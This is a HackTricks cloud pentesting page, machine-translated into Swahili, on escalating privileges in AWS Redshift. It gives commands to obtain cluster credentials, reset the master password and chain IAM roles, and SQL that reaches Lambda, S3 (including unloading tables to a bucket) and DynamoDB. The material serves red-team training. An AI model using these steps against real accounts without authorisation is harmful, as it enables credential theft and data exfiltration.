AWS - Redshift Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Redshift

Kwa maelezo zaidi kuhusu RDS angalia:

AWS - Redshift Enum

`redshift:DescribeClusters`, `redshift:GetClusterCredentials`

Kwa ruhusa hizi unaweza kupata habari za makundi yote (ikiwemo jina na jina la mtumiaji wa kundi) na kupata akreditif za kuweza kufikia:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`

Kwa ruhusa hizi unaweza kupata taarifa za makundi yote na kupata akreditivu za kuweza kuyafikia. Kumbuka kwamba mtumiaji wa postgres atakuwa na ruhusa ambazo utambulisho wa IAM ulio tumika kupata akreditivu unao.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:ModifyCluster?`

Inawezekana kubadilisha nenosiri la mkuu la mtumiaji wa ndani wa postgres (redshit) kutoka aws cli (nadhani hizo ndizo ruhusa unazohitaji lakini sijazijaribu bado):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

Kufikia Huduma za Nje

Ili kufikia rasilimali zote zifuatazo, utahitaji kueleza jukumu la kutumia. Klasta ya Redshift inaweza kuwa na orodha ya majukumu ya AWS ambayo unaweza kutumia ikiwa unajua ARN au unaweza tu kuweka "default" kutumia ile ya kawaida iliyotolewa.

Zaidi ya hayo, kama ilivyoelezwa hapa, Redshift pia inaruhusu kuunganisha majukumu (mradi tu jukumu la kwanza linaweza kuchukua jukumu la pili) ili kupata ufikiaji zaidi lakini tu kwa kuwatenganisha kwa alama ya koma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana kuita kazi ya lambda kutoka redshift kwa kitu kama:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika kwenye S3 buckets:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

Jedwali la Amazon DynamoDB linalotoa data lazima liundwe katika Mkoa mmoja wa AWS kama klasta yako isipokuwa utumie chaguo la REGION kubaini Mkoa wa AWS ambapo jedwali la Amazon DynamoDB lipo.